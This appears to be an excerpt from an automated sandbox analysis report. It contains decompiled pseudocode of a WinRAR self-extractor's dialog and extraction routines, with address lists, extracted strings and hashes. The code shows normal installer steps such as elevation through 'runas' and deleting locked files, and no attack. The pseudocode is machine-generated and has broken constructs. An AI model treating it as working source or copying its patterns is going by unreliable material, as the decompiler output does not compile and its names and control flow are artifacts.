							_push( *0x440d00);
							_push(_t288);
							E0040E582(_t288);
						}
						__eflags =  *0x440cfc;
						if( *0x440cfc != 0) {
							L88:
							_t277 = SetDlgItemTextW;
							__eflags =  *0x440d10;
							if( *0x440d10 == 0) {
								SetDlgItemTextW(_t288, 0x6b, E0040C05C(0xbf));
								SetDlgItemTextW(_t288, 1, E0040C05C(0xbe));
							}
							__eflags =  *0x440d0c;
							if( *0x440d0c <= 0) {
								L99:
								__eflags =  *0x440d2c - 2;
								if( *0x440d2c == 2) {
									EnableWindow( *(_t290 + 0x10), 0);
								}
								__eflags =  *0x440d28;
								if( *0x440d28 != 0) {
									E00406013(_t288, 0x67, 0);
									E00406013(_t288, 0x66, 0);
								}
								_t118 =  *0x440d2c;
								__eflags = _t118;
								if(_t118 != 0) {
									__eflags =  *0x440cea;
									if( *0x440cea == 0) {
										_push(0);
										_push(1);
										_push(0x111);
										_push(_t288);
										__eflags = _t118 - 1;
										if(_t118 != 1) {
											PostMessageW();
										} else {
											SendMessageW(); // executed
										}
									}
								}
								__eflags =  *0x440ce8;
								if( *0x440ce8 != 0) {
									SetDlgItemTextW(_t288, 1, E0040C05C(0x90));
								}
								goto L110;
							} else {
								_push(0);
								_push( *0x440d00);
								_push(_t288); // executed
								E0040E582(_t288); // executed
								_t129 =  *0x440d04;
								__eflags = _t129;
								if(_t129 != 0) {
									__eflags =  *0x440d2c;
									if(__eflags == 0) {
										_t263 =  *0x437ccc; // 0x0
										E00419542(_t263, __eflags,  *0x432a64,  *(_t290 + 0x14), _t129, 0, 0);
										_push( *0x440d04);
										E00419DFE(0, _t277, _t288, __eflags);
									}
								}
								__eflags =  *0x440d2c - 1;
								if( *0x440d2c == 1) {
									L98:
									_push(1);
									_push( *0x440d00);
									_push(_t288);
									E0040E582(_t288);
									goto L99;
								} else {
									SetForegroundWindow(_t288);
									__eflags =  *0x440d2c - 1;
									if( *0x440d2c == 1) {
										goto L98;
									}
									__eflags =  *0x440d31;
									if( *0x440d31 != 0) {
										goto L98;
									}
									_t132 = DialogBoxParamW( *0x432a64, L"LICENSEDLG", 0, E0040F1A6, 0);
									__eflags = _t132;
									if(_t132 == 0) {
										L16:
										 *0x440cea = 1;
										L17:
										_push(1);
										L13:
										EndDialog(_t288, ??);
										L110:
										_t120 = 1;
										__eflags = 1;
										L111:
										goto L112;
									}
									goto L98;
								}
							}
						} else {
							__eflags = 0;
							 *((short*)(_t290 - 0x966c)) = 0;
							 *(_t290 + 0xc) = 0xaa;
							do {
								__eflags =  *(_t290 + 0xc) - 0xaa;
								if( *(_t290 + 0xc) != 0xaa) {
									L82:
									__eflags =  *(_t290 + 0xc) - 0xab;
									if( *(_t290 + 0xc) != 0xab) {
										L84:
										E0041A0C1(_t290 - 0x966c, " ");
										E0041A0C1(_t290 - 0x966c, E0040C05C( *(_t290 + 0xc)));
										goto L85;
									}
									__eflags =  *0x440d10;
									if( *0x440d10 != 0) {
										goto L85;
									}
									goto L84;
								}
								__eflags =  *0x440d10;
								if( *0x440d10 == 0) {
									goto L85;
								}
								goto L82;
								L85:
								 *(_t290 + 0xc) =  &( *(_t290 + 0xc)->i);
								__eflags =  *(_t290 + 0xc) - 0xb0;
							} while ( *(_t290 + 0xc) <= 0xb0);
							__eflags =  *0x440d2c;
							if(__eflags == 0) {
								_t269 =  *0x437ccc; // 0x0
								E00419542(_t269, __eflags,  *0x432a64,  *(_t290 + 0x14), _t290 - 0x966c, 0, 0);
							}
							goto L88;
						}
					}
					__eflags = _t105 != 1;
					if(_t105 != 1) {
						L7:
						_t120 = 0;
						goto L111;
					}
					_t153 = ( *(_t290 + 0x10) & 0x0000ffff) - 1;
					__eflags = _t153;
					if(_t153 == 0) {
						_t280 = 0x800;
						GetDlgItemTextW(_t288, 0x66, _t290 - 0x2148, 0x800);
						__eflags =  *0x440ce9;
						if( *0x440ce9 == 0) {
							__eflags =  *0x440ce8;
							if( *0x440ce8 == 0) {
								_t156 = GetDlgItem(_t288, 0x68);
								 *(_t290 + 0xc) = _t156;
								__eflags =  *0x440cf0;
								if( *0x440cf0 == 0) {
									SendMessageW(_t156, 0xb1, 0, 0xffffffff);
									SendMessageW( *(_t290 + 0xc), 0xc2, 0, 0x42a53c);
									_t280 = 0x800;
								}
								SetFocus( *(_t290 + 0xc));
								__eflags =  *0x440d28;
								if( *0x440d28 == 0) {
									E0041078F(_t290 - 0x1148, _t290 - 0x2148, _t280);
									E0040DA6B(_t290, _t290 - 0x1148, _t280);
									E0040D452(_t290 - 0x3248, 0x880, E0040C05C(0xb9), _t290 - 0x1148);
									_t292 = _t292 + 0x10;
									_t167 = _t290 - 0x3248;
								} else {
									_t167 = E0040C05C(0xba);
								}
								E0040CFBD(0, _t167); // executed
								__eflags =  *0x440d31;
								if( *0x440d31 == 0) {
									E0040D779(_t288, _t290 - 0x2148);
								}
								 *(_t290 + 0xf) = 0;
								_t170 = E004090CB(0, _t261, _t280, _t290 - 0x2148, 0); // executed
								__eflags = _t170;
								if(_t170 != 0) {
									L31:
									_t172 = E0041972D(_t290 - 0x2148);
									 *(_t290 + 0x13) = _t172;
									__eflags = _t172;
									if(_t172 == 0) {
										_t239 = GetLastError();
										__eflags = _t239 - 5;
										if(_t239 == 5) {
											 *(_t290 + 0xf) = 1;
										}
									}
									__eflags =  *0x440d31;
									if( *0x440d31 != 0) {
										L40:
										__eflags =  *(_t290 + 0x13);
										if( *(_t290 + 0x13) != 0) {
											_t282 = 1;
											 *0x440cec = 1;
											E00406031(_t288, 0x67, 0);
											E00406031(_t288, 0x66, 0);
											E00406013(_t288, 1, 0);
											E00406031(_t288, 0x69, 1);
											SetDlgItemTextW(_t288, 0x65, 0x42a53c); // executed
											_t178 = GetDlgItem(_t288, 0x65);
											 *(_t290 + 0xc) = _t178;
											__eflags = _t178;
											if(_t178 != 0) {
												_t193 = GetWindowLongW(_t178, 0xfffffff0) | 0x00000080;
												__eflags = _t193;
												SetWindowLongW( *(_t290 + 0xc), 0xfffffff0, _t193);
											}
											_push(5);
											_push( *0x440d00);
											_push(_t288);
											E0040E582(_t288);
											_push(2);
											_push( *0x440d00);
											_push(_t288);
											E0040E582(_t288);
											_push(0x438cd8);
											_push(_t288); // executed
											E0040DFC4(_t261, _t274, __eflags); // executed
											_push(6);
											_push( *0x440d00);
											_push(_t288);
											E0040E582(_t288);
											__eflags =  *0x440cea;
											if( *0x440cea == 0) {
												__eflags =  *0x440cf0;
												if( *0x440cf0 == 0) {
													__eflags =  *0x440d1c;
													if( *0x440d1c == 0) {
														_push(4);
														_push( *0x440d00);
														_push(_t288); // executed
														E0040E582(_t288); // executed
													}
												}
											}
											E00406013(_t288, _t282, _t282);
											 *0x440cec = 0;
											goto L62;
										}
										__eflags =  *0x440d31;
										if( *0x440d31 != 0) {
											 *(_t290 + 0xf) = 0;
										}
										L43:
										__eflags =  *(_t290 + 0xf);
										 *(_t290 + 0xf) =  *(_t290 + 0xf) == 0;
										__eflags =  *(_t290 + 0xf);
										if( *(_t290 + 0xf) != 0) {
											L54:
											_push(E0040C05C(0x9a));
											E0040D452(_t290 - 0x4648, 0xa00, L"\"%s\"\n%s", _t290 - 0x2148);
											E00406222(0x432a6c, 1);
											MessageBoxW(_t288, _t290 - 0x4648, E0040C05C(0x96), 0x30);
											 *0x440cf0 =  *0x440cf0 + 1;
											L12:
											_push(0);
											goto L13;
										}
										GetModuleFileNameW(0, _t290 - 0x1148, 0x800);
										E0040CC83(0x442d32, _t290 - 0x148, 0x80);
										_push(0x441d32);
										_push(_t290 - 0x148);
										E0040D452(_t290 - 0x9c84, 0x230c, L"-el -s2 \"-d%s\" \"-p%s\" \"-sp%s\"", _t290 - 0x2148);
										_t292 = _t292 + 0x18;
										 *((intOrPtr*)(_t290 - 0x38)) = _t290 - 0x1148;
										 *(_t290 - 0x48) = 0x3c;
										 *((intOrPtr*)(_t290 - 0x44)) = 0x40;
										 *(_t290 - 0x40) = _t288;
										 *((intOrPtr*)(_t290 - 0x3c)) = L"runas";
										 *((intOrPtr*)(_t290 - 0x34)) = _t290 - 0x9c84;
										 *((intOrPtr*)(_t290 - 0x30)) = 0x42a630;
										 *(_t290 - 0x2c) = 1;
										 *((intOrPtr*)(_t290 - 0x28)) = 0;
										_t213 = CreateFileMappingW(0xffffffff, 0, 0x8000004, 0, 0x7000, L"winrarsfxmappingfile.tmp");
										 *(_t290 + 0x10) = _t213;
										__eflags = _t213;
										if(_t213 != 0) {
											_t223 = GetCommandLineW();
											__eflags = _t223;
											if(_t223 != 0) {
												E0041078F(0x439cd8, _t223, 0x2000);
											}
											E0040CE92(0x442d32, 0x43dcd8, 7);
											E0040CE92(0x442d32, 0x43ecd8, 2);
											E0040CE92(0x442d32, 0x43fcd8, 0x10);
											 *(_t290 + 0x14) = MapViewOfFile( *(_t290 + 0x10), 2, 0, 0, 0);
											E0041BB80(0, 0x7000, _t288, _t227, 0x439cd8, 0x7000);
											_t292 = _t292 + 0xc;
											UnmapViewOfFile( *(_t290 + 0x14));
										}
										_t215 = ShellExecuteExW(_t290 - 0x48);
										E0040CC38(_t290 - 0x148, 0x80);
										E0040CC38(_t290 - 0x9c84, 0x230c);
										__eflags = _t215;
										if(_t215 == 0) {
											 *(_t290 + 0xf) = 1;
										} else {
											WaitForInputIdle( *(_t290 - 0x10), 0x2710);
											Sleep(0x1f4);
											 *0x440d1c =  *(_t290 - 0x10);
										}
										__eflags =  *(_t290 + 0x10);
										if( *(_t290 + 0x10) != 0) {
											CloseHandle( *(_t290 + 0x10));
										}
										__eflags =  *(_t290 + 0xf);
										if( *(_t290 + 0xf) == 0) {
											goto L12;
										} else {
											goto L54;
										}
									}
									__eflags =  *(_t290 + 0x13);
									if( *(_t290 + 0x13) == 0) {
										goto L43;
									}
									E0040D452(_t290 - 0x1148, _t280, L"__tmp_rar_sfx_access_check_%u", GetTickCount());
									_t292 = _t292 + 0x10;
									E00408533(_t290 - 0x566c);
									 *(_t290 - 4) = 0;
									_t236 = E004086D1(_t290 - 0x566c, _t290 - 0x1148, 9); // executed
									 *(_t290 + 0x13) = _t236;
									__eflags = _t236;
									if(_t236 == 0) {
										_t238 = GetLastError();
										__eflags = _t238 - 5;
										if(_t238 == 5) {
											 *(_t290 + 0xf) = 1;
										}
									}
									_t34 = _t290 - 4;
									 *_t34 =  *(_t290 - 4) | 0xffffffff;
									__eflags =  *_t34;
									_t261 = _t290 - 0x566c;
									E004089F9(0, _t290 - 0x566c);
									goto L40;
								}
								_t240 = GetLastError();
								__eflags = _t240 - 5;
								if(_t240 == 5) {
									L30:
									 *(_t290 + 0xf) = 1;
									goto L31;
								}
								__eflags = _t240 - 3;
								if(_t240 != 3) {
									goto L31;
								}
								goto L30;
							} else {
								 *0x440cea = 1;
								_t282 = 1;
								L62:
								__eflags =  *0x440cf0;
								if( *0x440cf0 <= 0) {
									L68:
									EndDialog(_t288, _t282); // executed
									L69:
									_t120 = _t282;
									goto L111;
								}
								__eflags =  *0x440cea;
								if( *0x440cea != 0) {
									goto L68;
								}
								 *0x440ce9 = 1;
								SetDlgItemTextW(_t288, _t282, E0040C05C(0x90));
								_t187 =  *0x432a6c; // 0x0
								__eflags = _t187 - 9;
								if(_t187 != 9) {
									__eflags = _t187 - 3;
									_t260 = ((_t187 != 0x00000003) - 0x00000001 & 0x0000000a) + 0x97;
									__eflags = ((_t187 != 0x00000003) - 0x00000001 & 0x0000000a) + 0x97;
								} else {
									_t260 = 0xa0;
								}
								_t188 = E0040C05C(0x96);
								MessageBoxW(_t288, E0040C05C(_t260), _t188, 0x30);
								goto L69;
							}
						}
						__eflags =  *0x440ce8;
						if( *0x440ce8 == 0) {
							goto L17;
						}
						goto L16;
					}
					_t245 = _t153 - 1;
					__eflags = _t245;
					if(_t245 == 0) {
						 *0x440cea = 1;
						__eflags =  *0x440cec;
						if( *0x440cec == 0) {
							goto L12;
						}
						__eflags =  *0x440cf0;
						if( *0x440cf0 != 0) {
							goto L110;
						}
						goto L12;
					}
					__eflags = _t245 == 0x65;
					if(_t245 == 0x65) {
						_t249 = E00405088(_t288, E0040C05C(0x64), _t290 - 0x1148);
						__eflags = _t249;
						if(_t249 != 0) {
							SetDlgItemTextW(_t288, 0x66, _t290 - 0x1148);
						}
						goto L110;
					}
					goto L7;
				} else {
					_t120 = 1;
					L112:
					 *[fs:0x0] =  *((intOrPtr*)(_t290 - 0xc));
					return _t120;
				}
			}

0x0040f2b8
0x0040f2b8
0x0040f2b8
0x0040f2bd
0x0040f2c7
0x0040f2ce
0x0040f2e4
0x0040f2eb
0x0040f2f8
0x0040f2f8
0x0040f2fe
0x0040f887
0x0040f88c
0x0040f892
0x0040f898
0x0040f89a
0x0040f8a5
0x0040f8a5
0x0040f8ab
0x0040f8b0
0x0040f8b2
0x0040f8be
0x0040f8be
0x0040f8c5
0x0040f8d3
0x0040f8e1
0x0040f8e4
0x0040f8f6
0x0040f900
0x0040f903
0x0040f908
0x0040f90f
0x0040f911
0x0040f911
0x0040f91b
0x0040f924
0x0040f929
0x0040f92e
0x0040f933
0x0040f938
0x0040f939
0x0040f93f
0x0040f944
0x0040f94a
0x0040f94c
0x0040f94e
0x0040f954
0x0040f955
0x0040f955
0x0040f95a
0x0040f960
0x0040f9f0
0x0040f9f0
0x0040f9f6
0x0040f9fc
0x0040fa0c
0x0040fa1c
0x0040fa1c
0x0040fa1e
0x0040fa24
0x0040faba
0x0040faba
0x0040fac1
0x0040fac7
0x0040fac7
0x0040facd
0x0040fad3
0x0040fad9
0x0040fae2
0x0040fae2
0x0040fae7
0x0040faec
0x0040faee
0x0040faf0
0x0040faf6
0x0040faf8
0x0040faf9
0x0040fafb
0x0040fb00
0x0040fb01
0x0040fb04
0x0040fb0e
0x0040fb06
0x0040fb06
0x0040fb06
0x0040fb04
0x0040faf6
0x0040fb14
0x0040fb1a
0x0040fb2a
0x0040fb2a
0x00000000
0x0040fa2a
0x0040fa2a
0x0040fa2b
0x0040fa31
0x0040fa32
0x0040fa37
0x0040fa3c
0x0040fa3e
0x0040fa40
0x0040fa46
0x0040fa48
0x0040fa5a
0x0040fa5f
0x0040fa65
0x0040fa6a
0x0040fa46
0x0040fa6b
0x0040fa72
0x0040faac
0x0040faac
0x0040faae
0x0040fab4
0x0040fab5
0x00000000
0x0040fa74
0x0040fa75
0x0040fa7b
0x0040fa82
0x00000000
0x00000000
0x0040fa84
0x0040fa8a
0x00000000
0x00000000
0x0040fa9e
0x0040faa4
0x0040faa6
0x0040f39d
0x0040f39d
0x0040f3a4
0x0040f3a4
0x0040f36b
0x0040f36c
0x0040fb2c
0x0040fb2e
0x0040fb2e
0x0040fb2f
0x00000000
0x0040fb2f
0x00000000
0x0040faa6
0x0040fa72
0x0040f966
0x0040f966
0x0040f96d
0x0040f974
0x0040f977
0x0040f977
0x0040f97a
0x0040f984
0x0040f984
0x0040f98b
0x0040f995
0x0040f9a1
0x0040f9b8
0x00000000
0x0040f9be
0x0040f98d
0x0040f993
0x00000000
0x00000000
0x00000000
0x0040f993
0x0040f97c
0x0040f982
0x00000000
0x00000000
0x00000000
0x0040f9bf
0x0040f9bf
0x0040f9c2
0x0040f9c2
0x0040f9cb
0x0040f9d1
0x0040f9d3
0x0040f9eb
0x0040f9eb
0x00000000
0x0040f9d1
0x0040f960
0x0040f304
0x0040f305
0x0040f316
0x0040f316
0x00000000
0x0040f316
0x0040f30b
0x0040f30b
0x0040f30c
0x0040f377
0x0040f387
0x0040f38d
0x0040f393
0x0040f3a8
0x0040f3ae
0x0040f3c2
0x0040f3c8
0x0040f3cb
0x0040f3d1
0x0040f3e2
0x0040f3f2
0x0040f3f4
0x0040f3f4
0x0040f3fc
0x0040f402
0x0040f408
0x0040f425
0x0040f432
0x0040f455
0x0040f45a
0x0040f45d
0x0040f40a
0x0040f40f
0x0040f40f
0x0040f465
0x0040f46a
0x0040f470
0x0040f479
0x0040f479
0x0040f486
0x0040f489
0x0040f48e
0x0040f490
0x0040f4a6
0x0040f4ad
0x0040f4b2
0x0040f4b5
0x0040f4b7
0x0040f4b9
0x0040f4bf
0x0040f4c2
0x0040f4c4
0x0040f4c4
0x0040f4c2
0x0040f4c8
0x0040f4ce
0x0040f538
0x0040f538
0x0040f53b
0x0040f746
0x0040f748
0x0040f74e
0x0040f757
0x0040f75f
0x0040f768
0x0040f775
0x0040f77e
0x0040f784
0x0040f787
0x0040f789
0x0040f794
0x0040f794
0x0040f79f
0x0040f79f
0x0040f7a5
0x0040f7a7
0x0040f7ad
0x0040f7ae
0x0040f7b3
0x0040f7b5
0x0040f7bb
0x0040f7bc
0x0040f7c1
0x0040f7c6
0x0040f7c7
0x0040f7cc
0x0040f7ce
0x0040f7d4
0x0040f7d5
0x0040f7da
0x0040f7e0
0x0040f7e2
0x0040f7e8
0x0040f7ea
0x0040f7f0
0x0040f7f2
0x0040f7f4
0x0040f7fa
0x0040f7fb
0x0040f7fb
0x0040f7f0
0x0040f7e8
0x0040f803
0x0040f808
0x00000000
0x0040f808
0x0040f541
0x0040f547
0x0040f549
0x0040f549
0x0040f54c
0x0040f54c
0x0040f54f
0x0040f553
0x0040f556
0x0040f6e4
0x0040f6ee
0x0040f707
0x0040f716
0x0040f730
0x0040f736
0x0040f36a
0x0040f36a
0x00000000
0x0040f36a
0x0040f569
0x0040f580
0x0040f585
0x0040f590
0x0040f5a9
0x0040f5ae
0x0040f5c8
0x0040f5d4
0x0040f5db
0x0040f5e2
0x0040f5e5
0x0040f5ec
0x0040f5ef
0x0040f5f6
0x0040f5fd
0x0040f600
0x0040f606
0x0040f609
0x0040f60b
0x0040f60d
0x0040f613
0x0040f615
0x0040f622
0x0040f622
0x0040f62e
0x0040f63a
0x0040f646
0x0040f660
0x0040f663
0x0040f668
0x0040f66e
0x0040f66e
0x0040f678
0x0040f68c
0x0040f69d
0x0040f6a2
0x0040f6a4
0x0040f6c9
0x0040f6a6
0x0040f6ae
0x0040f6b9
0x0040f6c2
0x0040f6c2
0x0040f6cd
0x0040f6d0
0x0040f6d5
0x0040f6d5
0x0040f6db
0x0040f6de
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f6de
0x0040f4d0
0x0040f4d3
0x00000000
0x00000000
0x0040f4e9
0x0040f4ee
0x0040f4f7
0x0040f50b
0x0040f50e
0x0040f513
0x0040f516
0x0040f518
0x0040f51a
0x0040f520
0x0040f523
0x0040f525
0x0040f525
0x0040f523
0x0040f529
0x0040f529
0x0040f529
0x0040f52d
0x0040f533
0x00000000
0x0040f533
0x0040f492
0x0040f498
0x0040f49b
0x0040f4a2
0x0040f4a2
0x00000000
0x0040f4a2
0x0040f49d
0x0040f4a0
0x00000000
0x00000000
0x00000000
0x0040f3b0
0x0040f3b2
0x0040f3b9
0x0040f80e
0x0040f80e
0x0040f814
0x0040f878
0x0040f87a
0x0040f880
0x0040f880
0x00000000
0x0040f880
0x0040f816
0x0040f81c
0x00000000
0x00000000
0x0040f823
0x0040f832
0x0040f838
0x0040f83d
0x0040f840
0x0040f84b
0x0040f855
0x0040f855
0x0040f842
0x0040f842
0x0040f842
0x0040f862
0x0040f870
0x00000000
0x0040f870
0x0040f3ae
0x0040f395
0x0040f39b
0x00000000
0x00000000
0x00000000
0x0040f39b
0x0040f30e
0x0040f30e
0x0040f30f
0x0040f34f
0x0040f356
0x0040f35c
0x00000000
0x00000000
0x0040f35e
0x0040f364
0x00000000
0x00000000
0x00000000
0x0040f364
0x0040f311
0x0040f314
0x0040f32d
0x0040f332
0x0040f334
0x0040f344
0x0040f344
0x00000000
0x0040f334
0x00000000
0x0040f2ed
0x0040f2ef
0x0040fb30
0x0040fb35
0x0040fb3d
0x0040fb3d

APIs

__EH_prolog.LIBCMT ref: 0040F2BD

Strings

"%s"%s, xrefs: 0040F6F6
STARTDLG, xrefs: 0040F2D5
<, xrefs: 0040F5D4
-el -s2 "-d%s" "-p%s" "-sp%s", xrefs: 0040F598
2D, xrefs: 0040F903
l*C, xrefs: 0040F711
winrarsfxmappingfile.tmp, xrefs: 0040F5B1
@, xrefs: 0040F5DB
__tmp_rar_sfx_access_check_%u, xrefs: 0040F4DC
2-D, xrefs: 0040F57B
LICENSEDLG, xrefs: 0040FA93

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID: "%s"%s$-el -s2 "-d%s" "-p%s" "-sp%s"$2D$2-D$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$l*C$winrarsfxmappingfile.tmp
API String ID: 3519838083-1487395172
Opcode ID: 6acf6528584baaaca6527e78956e1805b40c4040295e22a2fc5e6f9255cb5ca7
Instruction ID: c19460c2e21afaa3beeb85123d0feb520ebf0622a7eadce4a0fa464ccc105cc5
Opcode Fuzzy Hash: 6acf6528584baaaca6527e78956e1805b40c4040295e22a2fc5e6f9255cb5ca7
Instruction Fuzzy Hash: EB22B4B1940204FBEB31AFA09C85EDF3A68AB05304F40417BFA05B61D2D77D5A59CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040E582, Relevance: 73.9, APIs: 35, Strings: 7, Instructions: 411
windowfileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040E582(void* __esi) {
				intOrPtr _t271;
				void* _t274;
				void* _t349;
				short* _t352;
				void* _t354;

				E00419DD4(E00429301, _t354);
				_t271 = E0041A3E0(0x1bc84);
				if( *((intOrPtr*)(_t354 + 0xc)) == 0) {
					L165:
					 *[fs:0x0] =  *((intOrPtr*)(_t354 - 0xc));
					return _t271;
				}
				_t271 = E0040D46E(_t354 - 0x11, _t354 - 0xec90, __esi,  *((intOrPtr*)(_t354 + 0xc)), _t354 - 0x4440, _t354 + 0xf, 0x1000);
				 *((intOrPtr*)(_t354 + 0xc)) = _t271;
				if(_t271 != 0) {
					_push(__esi);
					do {
						_t349 = GetFileAttributesW;
						_t336 = _t354 - 0x1bc90;
						_t352 = 0x437cd0;
						_t274 = _t354 - 0x4440;
						 *(_t354 - 0x10) = _t354 - 0x1bc90;
						 *((intOrPtr*)(_t354 - 0x18)) = 6;
						goto L4;
						L6:
						while(E004119A6(_t354 - 0xec90,  *((intOrPtr*)(0x42f0f8 +  *(_t354 - 0x10) * 4))) != 0) {
							 *(_t354 - 0x10) =  *(_t354 - 0x10) + 1;
							if( *(_t354 - 0x10) < 0xe) {
								continue;
							} else {
								goto L163;
							}
						}
						if( *(_t354 - 0x10) > 0xd) {
							goto L163;
						}
						switch( *((intOrPtr*)( *(_t354 - 0x10) * 4 +  &M0040F16E))) {
							case 0:
								__eflags =  *((intOrPtr*)(_t354 + 0x10)) - 2;
								if( *((intOrPtr*)(_t354 + 0x10)) != 2) {
									goto L163;
								}
								E00419740(_t354 - 0x8c90, 0x800);
								E00409E1B(_t354 - 0x8c90, _t354 - 0x4440, _t354 - 0xfc90, 0x800);
								E004091A0(_t354 - 0x7c90);
								 *(_t354 - 4) =  *(_t354 - 4) & 0x00000000;
								E004091C9(_t354 - 0x7c90, _t354 - 0xfc90);
								E004065D5(_t354 - 0x5c88);
								_push(0);
								_t292 = E0040937B(_t354 - 0x7c90, _t347, _t354 - 0x5c88);
								__eflags = _t292;
								if(_t292 == 0) {
									L27:
									 *(_t354 - 4) =  *(_t354 - 4) | 0xffffffff;
									E004091B6(_t354 - 0x7c90);
									goto L163;
								} else {
									_t352 = L"%s.%d.tmp";
									do {
										SetFileAttributesW(_t354 - 0x5c88, 0);
										__eflags =  *((char*)(_t354 - 0x4c7c));
										if(__eflags == 0) {
											L19:
											_t297 = GetFileAttributesW(_t354 - 0x5c88);
											__eflags = _t297 - 0xffffffff;
											if(_t297 == 0xffffffff) {
												goto L26;
											}
											_t301 = DeleteFileW(_t354 - 0x5c88);
											__eflags = _t301;
											if(_t301 != 0) {
												goto L26;
											} else {
												 *(_t354 - 0x10) =  *(_t354 - 0x10) & _t301;
												_push(_t301);
												goto L23;
												L23:
												E0040D452(_t354 - 0x1040, 0x800, _t352, _t354 - 0x5c88);
												_t356 = _t356 + 0x14;
												_t306 = GetFileAttributesW(_t354 - 0x1040);
												__eflags = _t306 - 0xffffffff;
												if(_t306 != 0xffffffff) {
													_t67 = _t354 - 0x10;
													 *_t67 =  *(_t354 - 0x10) + 1;
													__eflags =  *_t67;
													_push( *(_t354 - 0x10));
													goto L23;
												} else {
													_t309 = MoveFileW(_t354 - 0x5c88, _t354 - 0x1040);
													__eflags = _t309;
													if(_t309 != 0) {
														MoveFileExW(_t354 - 0x1040, 0, 4);
													}
													goto L26;
												}
											}
										}
										E0040A4F3(__eflags, _t354 - 0x8c90, _t354 - 0x1040, 0x800);
										E00409DEB(__eflags, _t354 - 0x1040, 0x800);
										_t318 = E0041A0A7(_t354 - 0x8c90);
										 *((intOrPtr*)(_t354 - 0x18)) = _t318;
										__eflags = _t318 - 4;
										if(_t318 < 4) {
											L17:
											_t320 = E00409DA5(_t354 - 0x4440);
											__eflags = _t320;
											if(_t320 != 0) {
												goto L27;
											}
											L18:
											_t322 = E0041A0A7(_t354 - 0x5c88);
											__eflags = 0;
											 *((short*)(_t354 + _t322 * 2 - 0x5c86)) = 0;
											E0041A110(_t349, _t354 - 0x40, 0, 0x1e);
											_t356 = _t356 + 0x10;
											_push(0x14);
											_pop(_t325);
											 *((short*)(_t354 - 0x30)) = _t325;
											 *((intOrPtr*)(_t354 - 0x38)) = _t354 - 0x5c88;
											 *((intOrPtr*)(_t354 - 0x3c)) = 3;
											SHFileOperationW(_t354 - 0x40);
											goto L19;
										}
										_t330 = E0041A0A7(_t354 - 0x1040);
										__eflags =  *((intOrPtr*)(_t354 - 0x18)) - _t330;
										if( *((intOrPtr*)(_t354 - 0x18)) > _t330) {
											goto L18;
										}
										goto L17;
										L26:
										_push(0);
										_t299 = E0040937B(_t354 - 0x7c90, _t347, _t354 - 0x5c88);
										__eflags = _t299;
									} while (_t299 != 0);
									goto L27;
								}
							case 1:
								__eflags =  *(__ebp + 0x10);
								if( *(__ebp + 0x10) == 0) {
									__eax =  *0x440d04;
									__eflags = __eax;
									 *((char*)(__ebp - 0x12)) = __eax == 0;
									__eflags =  *((char*)(__ebp - 0x12));
									if( *((char*)(__ebp - 0x12)) == 0) {
										__eax = E0041A0C1(__eax, L"<br>");
										_pop(__ecx);
										_pop(__ecx);
									}
									__eflags =  *((char*)(__ebp - 0x11));
									if(__eflags == 0) {
										__edi = __ebp + 0xc;
										__edi = E0040D61A(__ebp + 0xc, __eflags);
									} else {
										__edi = __ebp - 0x4440;
									}
									__eflags =  *((char*)(__ebp - 0x12));
									if( *((char*)(__ebp - 0x12)) == 0) {
										__esi = E0041A0A7( *0x440d04);
									} else {
										__esi = 0;
									}
									__eax = E0041A0A7(__edi);
									__eax = __eax + __esi;
									_push(__eax);
									_push( *0x440d04);
									__eax = E00419E8C(__ebx, __edi, __esi, __eflags);
									__esp = __esp + 0xc;
									__eflags =  *((char*)(__ebp - 0x12));
									 *0x440d04 = __eax;
									if( *((char*)(__ebp - 0x12)) != 0) {
										__ecx = 0;
										__eflags = 0;
										 *__eax = __cx;
									}
									__eax = E0041A0C1(__eax, __edi);
									__eflags =  *((char*)(__ebp - 0x11));
									_pop(__ecx);
									_pop(__ecx);
									if(__eflags == 0) {
										_push(__edi);
										__eax = E00419DFE(__ebx, __edi, __esi, __eflags);
										_pop(__ecx);
									}
								}
								goto L163;
							case 2:
								__eflags =  *(__ebp + 0x10);
								if( *(__ebp + 0x10) == 0) {
									__ebp - 0x4440 = SetWindowTextW( *(__ebp + 8), __ebp - 0x4440);
								}
								goto L163;
							case 3:
								__eflags =  *(__ebp + 0x10);
								if( *(__ebp + 0x10) != 0) {
									goto L163;
								}
								__eflags =  *0x440d32;
								if( *0x440d32 != 0) {
									goto L163;
								}
								__eax = 0;
								__eflags =  *(__ebp - 0x4440) - 0x22;
								__edi = __ebp - 0x4440;
								 *(__ebp - 0x18) = __edi;
								 *(__ebp - 0x1040) = __ax;
								if( *(__ebp - 0x4440) == 0x22) {
									__edi = __ebp - 0x443e;
									 *(__ebp - 0x18) = __edi;
								}
								__eax = E0041A0A7(__edi);
								__eflags = __eax - __ebx;
								if(__eax >= __ebx) {
									goto L163;
								} else {
									__eax = __edi->i & 0x0000ffff;
									__eflags = __ax - 0x2e;
									if(__ax != 0x2e) {
										L52:
										__eflags = __ax - 0x5c;
										if(__ax == 0x5c) {
											L64:
											_push(__edi);
											L65:
											__eax = __ebp - 0x1040;
											_push(__ebp - 0x1040);
											__eax = E0041A0EF();
											L66:
											_pop(__ecx);
											_pop(__ecx);
											L67:
											__eax = __ebp - 0x1040;
											__eax = E0041C37F(__ebp - 0x1040, 0x22);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__eflags =  *((short*)(2 + __eax));
												if( *((short*)(2 + __eax)) == 0) {
													__ecx = 0;
													__eflags = 0;
													 *__eax = __cx;
												}
											}
											__ebp - 0x1040 = E0041A0EF(__esi, __ebp - 0x1040);
											_pop(__ecx);
											_pop(__ecx);
											__ebp - 0x1040 = E0040D803(__esi, __ebp - 0x1040, __ebx);
											__edi = GetDlgItem( *(__ebp + 8), 0x66);
											__ebp - 0x1040 = SetWindowTextW(__edi, __ebp - 0x1040); // executed
											__eax = SendMessageW(__edi, 0x143, 0, __esi); // executed
